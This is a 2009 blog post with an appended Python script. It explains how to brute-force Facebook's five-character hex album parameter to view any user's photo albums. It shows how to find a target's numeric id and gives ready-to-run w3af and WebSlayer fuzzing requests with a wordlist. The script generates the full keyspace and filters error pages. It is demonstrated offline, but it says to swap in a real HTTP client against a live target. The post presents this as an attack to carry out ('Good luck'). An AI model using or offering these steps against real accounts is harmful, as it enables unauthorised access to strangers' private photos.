Facebook Hack – Access Any Users Photo Albums
- March 12th, 2009
- By nukeit

Dave from Security Ninja shows how you can brute-force a single URL parameter with Burp Suite and gain access to any user's Facebook photo album. Here are the basics:
Access to an album on Facebook is controlled by three parameters in the URL, which you can see here:
http://www.facebook.com/album.php?aid=-3&id=1508034566&l=aad9c
aid=-3 (-3 is the profile-pictures album on every public profile)
id=0123456789 (the target's numeric user id; obtain it by searching for the user and hovering over the "Add Friend" button)
l=? (all we know is that it's 5 characters from the range 0123456789abcdef, which gives 16^5 = 1,048,576 possible values, i.e. only 20 bits of entropy)
Dave uses Burp Suite, but there are many ways you can go about it. I think a dictionary of all the possible values might be marginally faster (untested), so I'll use that.
First is one of my favorite methods, w3af's Fuzzy Requests and Clustered Responses tools. The request below feeds each line of the dictionary into the l parameter:
GET http://www.facebook.com/album.php?aid=-3&id=targetsid&l=$[l.strip() for l in file('fbhex.dic').readlines()]$ HTTP/1.0
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Here's the dictionary (1.1MB zipped, one 5-character hex value per line); extract it to your w3af directory.
After the run is finished, run the Cluster tool and wait. Every wrong guess returns the same error page, so those responses cluster together and the valid page should show up far away from the rest of them.
Another tool that could be used for this is Edge Security’s WebSlayer:
URL:
http://www.facebook.com/album.php?aid=-3&id=targetsid&l=FUZZ
Set it to ignore lines so you can find your valid request faster. At the moment the error page contains 71 lines, but this may be different for you. Just run the scan for a few seconds and look at the number of lines each error page contains, then stop the scan, enter that number in the "ignore lines" box and start again. Anything that is not filtered out is a candidate for the real album page.

Other useful features of WebSlayer are the ability to control the request rate and to set proxy options.
There are likely MANY other tools that you can use to accomplish this task, but these seem to be the simplest.
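As an added example (this is not code from the original post or from Dave's write-up), here is a small Python script that does the two things both tool sections above rely on: it generates the dictionary of all 16^5 five-character hex values, and it applies the same "ignore lines" filter WebSlayer uses, learning the error page's line count from a sample of responses and reporting every value whose response differs. The user id 1508034566, the value aad9c and the 71-line error page come from the URL and numbers in the post, but here they are only used inside a constructed fake fetcher (`fetch_fake`) so the script runs offline; all function names are this example's own, not any tool's API.

```python
import itertools
from collections import Counter

HEX_DIGITS = "0123456789abcdef"
KEY_LEN = 5
KEYSPACE = len(HEX_DIGITS) ** KEY_LEN  # 16**5 = 1,048,576 candidate values


def candidates():
    """Yield every 5-character lowercase hex string in order (00000 .. fffff)."""
    for digits in itertools.product(HEX_DIGITS, repeat=KEY_LEN):
        yield "".join(digits)


def write_dictionary(path):
    """Write the whole keyspace, one value per line, in the format w3af/WebSlayer read.
    Returns the number of lines written."""
    count = 0
    with open(path, "w") as fh:
        for value in candidates():
            fh.write(value + "\n")
            count += 1
    return count


def album_url(target_id, l_value, aid="-3"):
    """Build the album URL from the three parameters described in the post."""
    return f"http://www.facebook.com/album.php?aid={aid}&id={target_id}&l={l_value}"


def worst_case_hours(requests_per_second):
    """Time to exhaust the keyspace at a given request rate (a 5-hex-char token is tiny)."""
    return KEYSPACE / requests_per_second / 3600.0


def line_count(body):
    return len(body.splitlines())


def error_signature(fetch, target_id, sample_values):
    """Fetch a handful of responses and take the most common line count as the
    error-page fingerprint. This is the number WebSlayer's 'ignore lines' box wants."""
    counts = Counter(line_count(fetch(album_url(target_id, v))) for v in sample_values)
    return counts.most_common(1)[0][0]


def find_album(fetch, target_id, values, ignore_lines):
    """Walk the wordlist and return every value whose response is NOT the error page."""
    hits = []
    for v in values:
        body = fetch(album_url(target_id, v))
        if line_count(body) != ignore_lines:
            hits.append(v)
    return hits


# --- constructed fake target, so the example runs offline ---------------------
FAKE_TARGET_ID = "1508034566"   # id from the post's example URL
FAKE_SECRET = "aad9c"           # l value from the post's example URL
# Constructed 71-line error page (the count the post reports) and a longer album page.
FAKE_ERROR_PAGE = "\n".join(["<html>"] + ["<p>Invalid album.</p>"] * 69 + ["</html>"])
FAKE_ALBUM_PAGE = "\n".join(["<html>"] + ["<img src='photo.jpg'>"] * 118 + ["</html>"])


def fetch_fake(url):
    """Stand-in for an HTTP GET: returns the album only for the one valid l value."""
    if url.endswith("&l=" + FAKE_SECRET):
        return FAKE_ALBUM_PAGE
    return FAKE_ERROR_PAGE


def demo():
    """Run the whole procedure against the fake target over a short slice of the keyspace."""
    # Learn the error-page size from the first 50 candidates (all wrong guesses here).
    sig = error_signature(fetch_fake, FAKE_TARGET_ID, list(itertools.islice(candidates(), 50)))
    # Scan a small constructed slice around the secret instead of all 16**5 values.
    wordlist = ["aad9%s" % d for d in HEX_DIGITS]
    return sig, find_album(fetch_fake, FAKE_TARGET_ID, wordlist, sig)


if __name__ == "__main__":
    signature, hits = demo()
    print("error page lines:", signature)      # 71
    print("candidate l values:", hits)         # ['aad9c']
    print("full keyspace at 10 req/s: %.1f h" % worst_case_hours(10))
```

Against a live target you would replace `fetch_fake` with a real HTTP client and iterate `candidates()` directly; the point of `worst_case_hours` is that even a single-threaded scanner exhausts a 5-hex-character token in a little over a day, which is why the parameter is not a meaningful access control.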
Good luck, and remember:

Check out Dave’s post for the Burp Suite method he uses to generate the needed parameter.